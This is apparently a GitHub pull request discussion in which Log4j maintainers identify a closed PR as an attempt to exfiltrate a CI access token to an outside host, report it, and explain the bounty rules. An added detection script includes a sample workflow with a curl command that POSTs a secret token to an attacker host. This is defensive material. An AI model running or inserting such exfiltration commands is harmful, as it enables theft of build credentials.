
Conversation

rootd4ddy

[A clear and concise description of what the pull request is for along with a reference to the associated issue IDs, if they exist.]

Checklist

  • Base your changes on 2.x branch if you are targeting Log4j 2; use main otherwise
  • ./mvnw verify succeeds (if it fails due to code formatting issues reported by Spotless, simply run ./mvnw spotless:apply and retry)
  • Non-trivial changes contain an entry file in the src/changelog/.2.x.x directory
  • Tests for the changes are provided
  • Commits are signed (optional, but highly recommended)

@rootd4ddy rootd4ddy closed this Sep 5, 2024
@ppkarwasz
Contributor

This incident has been reported.

@vy
Member

vy commented Sep 5, 2024

The attack (rootd4ddy/logging-parent@49eb3ff) attempts to hijack secrets.DV_ACCESS_TOKEN to https://z1yhfhbr.c5.rs:

@ppkarwasz, shall we share this with Gradle too?

Other findings
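As an added example (not code from this thread or from the Log4j project), a heuristic scanner for the pattern vy describes above: a workflow step that references a `${{ secrets.* }}` value in the same step as a URL whose host is not on an allowlist. The allowlist, the sample workflow and the host `attacker.invalid` are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Hosts a build in this repository is expected to contact (assumption, not from the thread).
ALLOWED_HOSTS = {"ge.apache.org", "repository.apache.org", "github.com"}

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
URL_REF = re.compile(r"https?://[^\s\"'`)>]+")
STEP_START = re.compile(r"^\s*-\s+\w+:")  # a workflow step begins at "- key:"

def split_steps(workflow_text):
    """Group the lines of a workflow into steps (multi-line run blocks stay with their step)."""
    steps, current = [], []
    for line in workflow_text.splitlines():
        if STEP_START.match(line):
            if current:
                steps.append("\n".join(current))
            current = [line]
        elif current:
            current.append(line)
    if current:
        steps.append("\n".join(current))
    return steps

def find_secret_exfil(workflow_text, allowed_hosts=ALLOWED_HOSTS):
    """Return (secret_name, host) pairs for steps that use a secret next to a non-allowlisted host."""
    findings = []
    for step in split_steps(workflow_text):
        secrets = set(SECRET_REF.findall(step))
        if not secrets:
            continue
        for url in URL_REF.findall(step):
            host = (urlparse(url).hostname or "").lower()
            if host and host not in allowed_hosts:
                findings.extend((name, host) for name in sorted(secrets))
    return findings

# Constructed sample: one legitimate use of the token, one step shipping it elsewhere.
SAMPLE_WORKFLOW = """\
name: build
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build scan
        run: curl -H "Authorization: Bearer ${{ secrets.DV_ACCESS_TOKEN }}" https://ge.apache.org/api
      - name: Upload report
        run: |
          curl -s -X POST -d "t=${{ secrets.DV_ACCESS_TOKEN }}" https://attacker.invalid/collect
"""
```

The check is purely textual, so a secret bound at job level via `env:` and then read as a shell variable in a later step is not caught; treat it as a triage aid for incoming workflow changes, not a gate.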

@vy vy added the malicious label Sep 5, 2024
@ppkarwasz
Contributor

> @ppkarwasz, shall we share this with Gradle too?

GE_ACCESS_TOKEN is an access token to our INFRA-hosted https://ge.apache.org Develocity instance. I notified INFRA just in case.

@rootd4ddy
Author

rootd4ddy commented Sep 5, 2024 via email

@ppkarwasz
Contributor

ppkarwasz commented Sep 5, 2024

@rootd4ddy,

If you are referring to our YesWeHack program, attacks against our infrastructure do not qualify for a bounty:

> Program rules
>
> ...
> You cannot attack our infrastructure, including our source code repositories.
> ...
>
> Non-qualifying vulnerabilities
>
> ...
> Everything related to the build of the project or general infrastructure topics
> ...

If you are testing the security awareness of ASF project teams, please contact the ASF Security Team first: they can help you with your research project and provide "stealable" secrets without us necessarily knowing it.
cc/ @raboof
